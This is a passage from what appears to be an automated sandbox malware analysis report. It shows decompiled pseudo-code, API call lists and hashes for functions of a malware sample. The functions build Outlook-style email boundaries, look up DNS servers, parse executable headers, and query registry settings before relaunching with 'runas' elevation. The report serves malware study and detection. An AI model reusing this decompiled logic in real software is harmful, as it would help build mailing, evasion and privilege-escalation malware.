                                                                                                                                  0x0040ade6
                                                                                                                                  0x0040adf5
                                                                                                                                  0x0040adfe
                                                                                                                                  0x0040ae03
                                                                                                                                  0x0040ae0f
                                                                                                                                  0x0040ae18
                                                                                                                                  0x0040ae1b
                                                                                                                                  0x0040ae7f
                                                                                                                                  0x0040ae81
                                                                                                                                  0x0040ae83
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ae31
                                                                                                                                  0x0040ae3f
                                                                                                                                  0x0040ae3f
                                                                                                                                  0x0040ae43
                                                                                                                                  0x0040ae4f
                                                                                                                                  0x0040ae5e
                                                                                                                                  0x0040ae6e
                                                                                                                                  0x0040ae73
                                                                                                                                  0x0040ae7a
                                                                                                                                  0x0040ae7a
                                                                                                                                  0x0040aea5
                                                                                                                                  0x0040aeb6
                                                                                                                                  0x0040aedc

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                                                                    • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                                                                    • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                                                                    • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                                                                    • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                                                                    • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                                                                    • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                                                                  • wsprintfA.USER32 ref: 0040AEA5
                                                                                                                                    • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                                                                  • wsprintfA.USER32 ref: 0040AE4F
                                                                                                                                  • wsprintfA.USER32 ref: 0040AE5E
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                                                                  • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                                                                  • API String ID: 3631595830-1816598006
                                                                                                                                  • Opcode ID: 6529b2604f33923130454e2189857e6116d07f16e51892a90e4688e0fcd74ec4
                                                                                                                                  • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                                                                  • Opcode Fuzzy Hash: 6529b2604f33923130454e2189857e6116d07f16e51892a90e4688e0fcd74ec4
                                                                                                                                  • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                  			E00402DF2(intOrPtr _a4) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				long _v16;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				short _v30;
                                                                                                                                  				char _v32;
                                                                                                                                  				struct HINSTANCE__* _t18;
                                                                                                                                  				void* _t22;
                                                                                                                                  				signed int _t23;
                                                                                                                                  				short _t27;
                                                                                                                                  				signed int _t31;
                                                                                                                                  				intOrPtr* _t35;
                                                                                                                                  				intOrPtr* _t37;
                                                                                                                                  				CHAR* _t38;
                                                                                                                                  				void* _t40;
                                                                                                                                  
                                                                                                                                  				_t38 = "iphlpapi.dll";
                                                                                                                                  				_t18 = GetModuleHandleA(_t38);
                                                                                                                                  				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                                                                  					_t18 = LoadLibraryA(_t38);
                                                                                                                                  				}
                                                                                                                                  				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                                                                  					L18:
                                                                                                                                  					return 0;
                                                                                                                                  				} else {
                                                                                                                                  					_t35 = GetProcAddress(_t18, "GetNetworkParams");
                                                                                                                                  					if(_t35 == 0) {
                                                                                                                                  						goto L18;
                                                                                                                                  					}
                                                                                                                                  					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
                                                                                                                                  					_t33 =  &_v16;
                                                                                                                                  					_v8 = _t22;
                                                                                                                                  					_v16 = 0x4000;
                                                                                                                                  					_t23 =  *_t35(_t22,  &_v16);
                                                                                                                                  					if(_t23 != 0) {
                                                                                                                                  						goto L18;
                                                                                                                                  					}
                                                                                                                                  					_v12 = _v12 & _t23;
                                                                                                                                  					_t37 = _v8 + 0x10c;
                                                                                                                                  					if(_t37 == 0) {
                                                                                                                                  						L17:
                                                                                                                                  						HeapFree(GetProcessHeap(), 0, _v8);
                                                                                                                                  						return _v12;
                                                                                                                                  					} else {
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						L8:
                                                                                                                                  						_t40 = _t37 + 4;
                                                                                                                                  						if(_t40 == 0) {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						_t27 = 2;
                                                                                                                                  						_v32 = _t27;
                                                                                                                                  						__imp__#9(0x35);
                                                                                                                                  						_v30 = _t27;
                                                                                                                                  						__imp__#11(_t40);
                                                                                                                                  						_v28 = _t27;
                                                                                                                                  						if(_t27 == 0 || _t27 == 0xffffffff) {
                                                                                                                                  							__imp__#52(_t40);
                                                                                                                                  							if(_t27 == 0) {
                                                                                                                                  								goto L16;
                                                                                                                                  							}
                                                                                                                                  							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
                                                                                                                                  							_v28 = _t27;
                                                                                                                                  							goto L13;
                                                                                                                                  						} else {
                                                                                                                                  							L13:
                                                                                                                                  							if(_t27 != 0 && _t27 != 0xffffffff) {
                                                                                                                                  								_t31 = E00402CEB(_t33,  &_v32, _a4);
                                                                                                                                  								_pop(_t33);
                                                                                                                                  								_v12 = _t31;
                                                                                                                                  								if(_t31 != 0) {
                                                                                                                                  									goto L17;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L16:
                                                                                                                                  						_t37 =  *_t37;
                                                                                                                                  					} while (_t37 != 0);
                                                                                                                                  					goto L17;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(iphlpapi.dll,7620EA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                                                                  • htons.WS2_32(00000035), ref: 00402E88
                                                                                                                                  • inet_addr.WS2_32(?), ref: 00402E93
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                                                                  • String ID: GetNetworkParams$iphlpapi.dll
                                                                                                                                  • API String ID: 929413710-2099955842
                                                                                                                                  • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                                                                  • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                                                                  • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                                                                  • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040675C(CHAR* _a4, long* _a8, long _a12) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				struct _OVERLAPPED* _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				struct _OVERLAPPED* _v24;
                                                                                                                                  				long _v28;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				intOrPtr _v60;
                                                                                                                                  				void _v68;
                                                                                                                                  				long _v72;
                                                                                                                                  				void _v132;
                                                                                                                                  				intOrPtr _v320;
                                                                                                                                  				signed int _v360;
                                                                                                                                  				signed int _v374;
                                                                                                                                  				void _v380;
                                                                                                                                  				void* _t85;
                                                                                                                                  				long _t88;
                                                                                                                                  				long _t102;
                                                                                                                                  				struct _OVERLAPPED* _t103;
                                                                                                                                  				long _t115;
                                                                                                                                  				long _t120;
                                                                                                                                  				signed int _t143;
                                                                                                                                  				void* _t146;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                  					SetFileAttributesA(_a4, 0x80);
                                                                                                                                  				}
                                                                                                                                  				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                                                                  				_v12 = _t85;
                                                                                                                                  				if(_t85 == 0xffffffff) {
                                                                                                                                  					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
                                                                                                                                  				}
                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                  					SetFileAttributesA(_a4, 2);
                                                                                                                                  				}
                                                                                                                                  				if(_v12 != 0xffffffff) {
                                                                                                                                  					_t88 = GetFileSize(_v12, 0);
                                                                                                                                  					_v8 = _t88;
                                                                                                                                  					if(_t88 == 0xffffffff || _t88 == 0) {
                                                                                                                                  						L31:
                                                                                                                                  						_v8 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_a12 = 0;
                                                                                                                                  						_v28 = 0;
                                                                                                                                  						if(ReadFile(_v12,  &_v132, 0x40,  &_a12, 0) == 0 || SetFilePointer(_v12, _v72, 0, 0) == 0xffffffff || ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0) == 0 || SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0) == 0xffffffff) {
                                                                                                                                  							goto L31;
                                                                                                                                  						} else {
                                                                                                                                  							_v20 = 0;
                                                                                                                                  							_v24 = 0;
                                                                                                                                  							if(0 < _v374) {
                                                                                                                                  								while(1) {
                                                                                                                                  									_t115 = 0x28;
                                                                                                                                  									_a12 = _t115;
                                                                                                                                  									if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									_t143 = _v374 & 0x0000ffff;
                                                                                                                                  									if(_v24 != _t143 - 1) {
                                                                                                                                  										_t120 = _v48 + _v52;
                                                                                                                                  									} else {
                                                                                                                                  										_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
                                                                                                                                  									}
                                                                                                                                  									_a12 = _t120;
                                                                                                                                  									if(_v20 < _t120) {
                                                                                                                                  										_v20 = _t120;
                                                                                                                                  									}
                                                                                                                                  									_v24 = _v24 + 1;
                                                                                                                                  									if(_v24 < _t143) {
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  									}
                                                                                                                                  									goto L23;
                                                                                                                                  								}
                                                                                                                                  								_v8 = 0;
                                                                                                                                  							}
                                                                                                                                  							L23:
                                                                                                                                  							if(_v24 >= (_v374 & 0x0000ffff)) {
                                                                                                                                  								_t102 = _v20;
                                                                                                                                  								if(_v8 > _t102) {
                                                                                                                                  									_v8 = _t102;
                                                                                                                                  								}
                                                                                                                                  								_t103 = E0040EBCC(_v8);
                                                                                                                                  								_v16 = _t103;
                                                                                                                                  								if(_t103 == 0) {
                                                                                                                                  									goto L31;
                                                                                                                                  								} else {
                                                                                                                                  									if(SetFilePointer(_v12, 0, 0, 0) == 0xffffffff) {
                                                                                                                                  										L30:
                                                                                                                                  										_v8 = 0;
                                                                                                                                  										E0040EC2E(_v16);
                                                                                                                                  										_v16 = 0;
                                                                                                                                  									} else {
                                                                                                                                  										_t146 = _v16;
                                                                                                                                  										if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
                                                                                                                                  											goto L30;
                                                                                                                                  										} else {
                                                                                                                                  											 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
                                                                                                                                  											_v8 = _v20;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					CloseHandle(_v12);
                                                                                                                                  				}
                                                                                                                                  				 *_a8 = _v8;
                                                                                                                                  				return _v16;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 004067D3
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040681F
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040685C
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,761B43E0,00000000), ref: 0040688B
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,761B43E0,00000000), ref: 00406906
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,00408244,00000000,?,761B43E0,00000000), ref: 0040691C
                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,761B43E0,00000000), ref: 00406971
                                                                                                                                    • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                                                                    • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Read$Pointer$AttributesCreateHeap$CloseFreeHandleProcessSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2622201749-0
                                                                                                                                  • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                                                                  • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                                                                  • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                                                                  • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E00409326(void* __ecx, void* __edx) {
                                                                                                                                  				void* __ebx;
                                                                                                                                  				char _t88;
                                                                                                                                  				void* _t89;
                                                                                                                                  				int _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				signed int _t97;
                                                                                                                                  				signed int _t100;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				char* _t106;
                                                                                                                                  				char* _t111;
                                                                                                                                  				signed int _t112;
                                                                                                                                  				char* _t116;
                                                                                                                                  				signed int _t117;
                                                                                                                                  				int _t119;
                                                                                                                                  				void* _t146;
                                                                                                                                  				signed int _t155;
                                                                                                                                  				int _t161;
                                                                                                                                  				signed int _t165;
                                                                                                                                  				signed int _t167;
                                                                                                                                  				void* _t168;
                                                                                                                                  				void* _t170;
                                                                                                                                  				void* _t172;
                                                                                                                                  				void* _t173;
                                                                                                                                  				void* _t175;
                                                                                                                                  				void* _t176;
                                                                                                                                  
                                                                                                                                  				_t146 = __ecx;
                                                                                                                                  				_t168 = _t170 - 0x60;
                                                                                                                                  				E00401910(0x19bc);
                                                                                                                                  				 *(_t168 - 0x58) = 0x9c;
                                                                                                                                  				if(GetVersionExA(_t168 - 0x58) == 0) {
                                                                                                                                  					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
                                                                                                                                  					_t9 = _t168 + 0x58;
                                                                                                                                  					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
                                                                                                                                  					__eflags =  *_t9;
                                                                                                                                  				} else {
                                                                                                                                  					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
                                                                                                                                  				}
                                                                                                                                  				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
                                                                                                                                  				if(_t88 == 0) {
                                                                                                                                  					 *(_t168 - 0x15c) = _t88;
                                                                                                                                  				}
                                                                                                                                  				_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  				_t89 = _t168 - 0x15c;
                                                                                                                                  				if( *(_t168 + 0x78) == 0) {
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push(_t89);
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
                                                                                                                                  					_t172 = _t170 + 0x40;
                                                                                                                                  				} else {
                                                                                                                                  					_push(_t89);
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                                                                  					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
                                                                                                                                  					_t172 = _t170 + 0x38;
                                                                                                                                  				}
                                                                                                                                  				 *(_t168 + 0x78) = _t92;
                                                                                                                                  				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
                                                                                                                                  				_t173 = _t172 + 0xc;
                                                                                                                                  				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
                                                                                                                                  					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
                                                                                                                                  					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
                                                                                                                                  					_push(_t168 - 0x15c);
                                                                                                                                  					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
                                                                                                                                  					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
                                                                                                                                  					_t173 = _t173 + 0x50;
                                                                                                                                  				}
                                                                                                                                  				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
                                                                                                                                  				 *(_t168 + 0x5c) = E00406EDD();
                                                                                                                                  				if( *(_t168 + 0x58) < 0x60) {
                                                                                                                                  					_t165 =  *(_t168 + 0x78);
                                                                                                                                  					_t161 = 0;
                                                                                                                                  					__eflags = 0;
                                                                                                                                  					L33:
                                                                                                                                  					__eflags =  *(_t168 + 0x5c) - _t161;
                                                                                                                                  					if( *(_t168 + 0x5c) == _t161) {
                                                                                                                                  						L38:
                                                                                                                                  						_push(_t168 - 0x95c);
                                                                                                                                  						_push(_t161);
                                                                                                                                  						L39:
                                                                                                                                  						_t96 = E004091EB();
                                                                                                                                  						__eflags =  *0x412180 - _t161; // 0x0
                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                  							 *0x412180 =  *0x412180 | _t165;
                                                                                                                                  							__eflags =  *0x412180;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t96 - 0x2a;
                                                                                                                                  						_t81 = _t96 == 0x2a;
                                                                                                                                  						__eflags = _t81;
                                                                                                                                  						_t97 = 0 | _t81;
                                                                                                                                  						L42:
                                                                                                                                  						return _t97;
                                                                                                                                  					}
                                                                                                                                  					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
                                                                                                                                  					__eflags = _t100;
                                                                                                                                  					if(_t100 != 0) {
                                                                                                                                  						_push(_t168 - 0x95c);
                                                                                                                                  						_push("runas");
                                                                                                                                  						goto L39;
                                                                                                                                  					}
                                                                                                                                  					_t103 =  *(_t168 + 0x78) | 0x5e0d0000;
                                                                                                                                  					__eflags = _t103;
                                                                                                                                  					 *0x412180 = _t103;
                                                                                                                                  					 *0x41217c =  *(_t168 + 0x54);
                                                                                                                                  					if(_t103 != 0) {
                                                                                                                                  						 *0x412180 = _t103 | _t165;
                                                                                                                                  					}
                                                                                                                                  					L31:
                                                                                                                                  					_t97 = 0;
                                                                                                                                  					goto L42;
                                                                                                                                  				}
                                                                                                                                  				 *(_t168 + 0x4c) = 4;
                                                                                                                                  				 *(_t168 + 0x44) = 5;
                                                                                                                                  				 *(_t168 + 0x48) = 1;
                                                                                                                                  				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
                                                                                                                                  				_t175 = _t173 + 0x14;
                                                                                                                                  				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
                                                                                                                                  					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
                                                                                                                                  					_t176 = _t175 + 0x14;
                                                                                                                                  					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
                                                                                                                                  					__eflags = _t112;
                                                                                                                                  					if(_t112 == 0) {
                                                                                                                                  						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
                                                                                                                                  						_t176 = _t176 + 0x14;
                                                                                                                                  						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
                                                                                                                                  						__eflags = _t117;
                                                                                                                                  						if(_t117 != 0) {
                                                                                                                                  							 *(_t168 + 0x78) = 0x3000;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						 *(_t168 + 0x78) = 0x2000;
                                                                                                                                  					}
                                                                                                                                  					RegCloseKey( *(_t168 + 0x50));
                                                                                                                                  					_t165 =  *(_t168 + 0x78);
                                                                                                                                  				} else {
                                                                                                                                  					_t165 = 0x1000;
                                                                                                                                  				}
                                                                                                                                  				_t161 = 0;
                                                                                                                                  				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
                                                                                                                                  					if( *(_t168 + 0x5c) <= _t161) {
                                                                                                                                  						goto L38;
                                                                                                                                  					}
                                                                                                                                  					_t119 =  *(_t168 - 0x4c);
                                                                                                                                  					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
                                                                                                                                  						 *0x41217c = _t119;
                                                                                                                                  						_t167 = _t165 | 0x5e0d0106;
                                                                                                                                  						__eflags = _t167;
                                                                                                                                  						goto L30;
                                                                                                                                  					} else {
                                                                                                                                  						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
                                                                                                                                  							 *0x41217c = _t161;
                                                                                                                                  							_t167 = _t165 | 0x5e0d0107;
                                                                                                                                  							L30:
                                                                                                                                  							 *0x412180 = _t167;
                                                                                                                                  							goto L31;
                                                                                                                                  						}
                                                                                                                                  						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
                                                                                                                                  						if(_t97 == _t161) {
                                                                                                                                  							_t155 =  *(_t168 + 0x78) | 0x5e0d0000;
                                                                                                                                  							 *0x412180 = _t155;
                                                                                                                                  							 *0x41217c =  *(_t168 + 0x5c);
                                                                                                                                  							if(_t155 != 0) {
                                                                                                                                  								 *0x412180 = _t155 | _t165;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L42;
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					goto L33;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  0x00409326
                                                                                                                                  0x00409327
                                                                                                                                  0x00409330
                                                                                                                                  0x00409339
                                                                                                                                  0x00409348
                                                                                                                                  0x00409358
                                                                                                                                  0x0040935c
Execution graph node addresses (basic blocks of the function at 0x00409340, in the order listed by the report; 0x00000000 marks unresolved nodes):
0x0040935c, 0x0040935c, 0x0040934a, 0x00409353, 0x00409353, 0x00409375, 0x0040937d, 0x0040937f, 0x0040937f, 0x0040938c, 0x00409394, 0x004093a2, 0x004093d9, 0x004093dc, 0x004093dd, 0x004093e0, 0x004093e3, 0x004093e6, 0x004093e9, 0x004093ec, 0x0040940c, 0x00409412,
0x004093a4, 0x004093a4, 0x004093a5, 0x004093a8, 0x004093ab, 0x004093ae, 0x004093b1, 0x004093ce, 0x004093d4, 0x004093d4, 0x0040941d, 0x00409420, 0x00409425, 0x0040942c, 0x00409441, 0x0040945d, 0x0040946b, 0x0040948d, 0x0040949b, 0x004094a0, 0x004094a0, 0x004094a3, 0x004094b0, 0x004094b3,
0x0040962f, 0x00409632, 0x00409632, 0x00409634, 0x00409634, 0x00409637, 0x0040967b, 0x00409681, 0x00409682, 0x00409683, 0x00409683, 0x0040968a, 0x00409690, 0x00409692, 0x00409692, 0x00409692, 0x0040969a, 0x0040969d, 0x0040969d, 0x004096a0, 0x004096a2, 0x004096a9, 0x004096a9,
0x00409641, 0x00409648, 0x0040964a, 0x00409673, 0x00409674, 0x00000000, 0x00409674, 0x00409652, 0x00409652, 0x00409657, 0x0040965c, 0x00409662, 0x00409666, 0x00409666, 0x0040962b, 0x0040962b, 0x00000000, 0x0040962b,
0x004094ce, 0x004094d5, 0x004094dc, 0x004094e3, 0x004094e8, 0x004094f9, 0x0040951a, 0x0040951f, 0x00409526, 0x0040952c, 0x0040952e, 0x00409551, 0x00409556, 0x0040955d, 0x00409563, 0x00409565, 0x00409567, 0x00409567, 0x00409530, 0x00409530, 0x00409530, 0x00409571, 0x00409577, 0x004094fb, 0x004094fb, 0x004094fb,
0x0040957a, 0x0040957f, 0x0040958d, 0x00000000, 0x00000000, 0x00409597, 0x0040959a, 0x0040961a, 0x0040961f, 0x0040961f, 0x00000000, 0x004095a3, 0x004095c0, 0x0040960c, 0x00409612, 0x00409625, 0x00409625, 0x00000000, 0x00409625,
